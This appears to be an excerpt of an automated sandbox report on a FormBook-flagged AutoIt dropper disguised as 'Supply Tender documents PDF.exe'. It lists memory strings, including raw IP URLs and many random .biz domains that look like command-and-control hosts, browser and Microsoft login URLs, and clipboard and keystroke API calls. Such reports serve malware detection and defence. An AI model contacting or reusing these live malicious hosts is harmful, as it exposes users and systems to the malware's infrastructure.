Source: armsvc.exe, 00000001.00000003.1876964528.0000000000758000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1868762894.0000000000745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133:80/poxjlsdujgwqdm
Source: armsvc.exe, armsvc.exe, 00000001.00000003.1714466779.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1680075627.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705474251.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1711817854.0000000000732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.43.119.120/keiggofpmujlpsm
Source: armsvc.exe, 00000001.00000003.1790576666.000000000072D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acwjcqqv.biz/
Source: armsvc.exe, armsvc.exe, 00000001.00000003.1714466779.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1680075627.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1860281118.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869487675.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821195919.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1656783636.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1790576666.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705474251.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1711817854.0000000000732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bumxkqgxu.biz/
Source: armsvc.exe	String found in binary or memory: http://deoci.biz/
Source: armsvc.exe, 00000001.00000003.1714466779.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1680075627.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1860281118.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869487675.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1648767341.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821195919.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1656783636.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1790576666.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705474251.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1711817854.0000000000732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://deoci.biz/V
Source: armsvc.exe, 00000001.00000003.1680075627.000000000072D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dwrqljrr.biz/$
Source: armsvc.exe, 00000001.00000003.1869487675.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://esuzf.biz/
Source: armsvc.exe, 00000001.00000003.1860281118.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869487675.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ftxlah.biz/
Source: armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1860281118.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869487675.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821195919.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1790576666.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gnqgo.biz/=
Source: armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gvijgjwkh.biz/
Source: armsvc.exe, 00000001.00000003.1583611733.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1618316519.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1648767341.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1656783636.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1568048824.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1561071676.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1605524611.0000000000735000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ifsaia.biz/
Source: armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821195919.000000000072E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iuzpxe.biz/
Source: armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1860281118.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869487675.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821195919.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1790576666.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jpskm.biz/
Source: armsvc.exe, 00000001.00000003.1239086357.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://knjghuig.biz/
Source: armsvc.exe, 00000001.00000003.1204207404.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1203642433.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1284435207.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1561607208.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1239116112.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1529049999.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1546103580.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1585034078.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1224752641.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1607132273.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1561292398.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1239208959.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1568227378.000000000072D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://npukfztj.biz/
Source: armsvc.exe, 00000001.00000003.1680075627.000000000072D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nqwjmb.biz/
Source: armsvc.exe, armsvc.exe, 00000001.00000003.1714466779.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705474251.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1711817854.0000000000732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://oshhkdluh.biz/
Source: mouslingly.exe, 00000003.00000002.1179809856.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000002.1320303145.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pywolwnvd.biz/
Source: armsvc.exe, 00000001.00000003.1648767341.000000000072D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qaynky.biz/b
Source: armsvc.exe, 00000001.00000003.1583611733.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1568048824.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://saytjshyf.biz/6
Source: armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1860281118.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869487675.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821195919.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sxmiywsfv.biz/
Source: armsvc.exe, 00000001.00000003.1618316519.0000000000737000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tbjrpv.biz/
Source: armsvc.exe, 00000001.00000003.1860281118.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869487675.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://typgfhb.biz//
Source: armsvc.exe, armsvc.exe, 00000001.00000003.1714466779.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1680075627.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1583611733.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1618316519.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1648767341.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1656783636.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705474251.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1605524611.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1711817854.0000000000732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vcddkls.biz/
Source: armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1860281118.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vrrazpdh.biz/
Source: armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1860281118.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869487675.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821195919.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1790576666.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vyome.biz/
Source: armsvc.exe, armsvc.exe, 00000001.00000003.1606239564.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1829501844.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1655822533.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1712264394.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877753259.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705808792.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1696600624.0000000000744000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1680075627.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1868762894.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844453947.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1664547021.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1859970243.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1790576666.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1623475183.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1806034617.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1886386196.0000000000742000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1617178443.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1633316415.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1820877502.0000000000746000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.fwiwk.biz/ldffypnuwfixybeu?usid=18&utid=30329248680
Source: armsvc.exe, 00000001.00000003.1618316519.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1648767341.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1656783636.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1605524611.0000000000735000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biz/
Source: armsvc.exe, armsvc.exe, 00000001.00000003.1606239564.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1829501844.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1655822533.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1712264394.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877753259.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705808792.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1696600624.0000000000744000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1680075627.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1868762894.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844453947.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1664547021.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1859970243.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1790576666.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1623475183.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1806034617.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1886386196.0000000000742000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1617178443.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1633316415.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1820877502.0000000000746000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.fwiwk.biz/xekypngstqrnaewh?usid=18&utid=30329248424
Source: armsvc.exe, 00000001.00000003.1224804927.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.przvgke.biz/tf
Source: armsvc.exe, 00000001.00000003.1561292398.0000000000707000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1545823203.0000000000707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.przvgke.biz/xgeytf?usid=18&utid=30329236071
Source: NSSASn0WvLKV.exe, 00000026.00000002.2452406678.0000000004D65000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.agistaking.xyz
Source: NSSASn0WvLKV.exe, 00000026.00000002.2452406678.0000000004D65000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.agistaking.xyz/bguu/
Source: Au3Info_x64.exe.1.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/
Source: Au3Info_x64.exe.1.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/8
Source: armsvc.exe, 00000001.00000003.1539310042.0000000001A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: armsvc.exe, 00000001.00000003.1545652051.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xlfhhhm.biz/
Source: armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1860281118.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869487675.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821195919.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1790576666.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://yauexmxk.biz/H
Source: armsvc.exe, 00000001.00000003.1680075627.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705474251.0000000000732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ytctnunms.biz/
Source: mfpmp.exe, 00000018.00000002.2464886952.00000000075EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: mfpmp.exe, 00000018.00000002.2464886952.00000000075EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mfpmp.exe, 00000018.00000002.2464886952.00000000075EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: mfpmp.exe, 00000018.00000002.2464886952.00000000075EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: armsvc.exe, 00000001.00000003.1638855844.0000000001BF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: armsvc.exe, 00000001.00000003.1640019075.0000000001BF0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1640762939.0000000001BF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: mfpmp.exe, 00000018.00000002.2464886952.00000000075EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: mfpmp.exe, 00000018.00000002.2464886952.00000000075EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mfpmp.exe, 00000018.00000002.2464886952.00000000075EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: mfpmp.exe, 00000018.00000002.2464886952.00000000075EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: mfpmp.exe, 00000018.00000002.2414107394.00000000029BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: mfpmp.exe, 00000018.00000002.2414107394.00000000029BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: mfpmp.exe, 00000018.00000002.2414107394.00000000029A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: mfpmp.exe, 00000018.00000003.1588246141.00000000075CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: mfpmp.exe, 00000018.00000002.2464886952.00000000075EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: armsvc.exe, armsvc.exe, 00000001.00000003.1606239564.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1214697118.0000000002710000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1655822533.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714466779.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1224586087.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1712264394.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705808792.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1696600624.0000000000744000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1680075627.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1218379642.0000000001DC0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1583611733.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1218306134.00000000019C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1860281118.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1284358311.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1664547021.0000000000748000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1545652051.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1618316519.0000000000737000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: mfpmp.exe, 00000018.00000002.2464886952.00000000075EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00473F66

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0046001C

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0048CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 25.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.2452406678.0000000004CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2402839580.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2439825242.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2437015933.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1400922862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1386107943.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1373314710.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1367546163.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2438305108.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00403B3A
Source: Supply Tender documents PDF.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Supply Tender documents PDF.exe, 00000000.00000000.1147595722.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_78fd096e-8
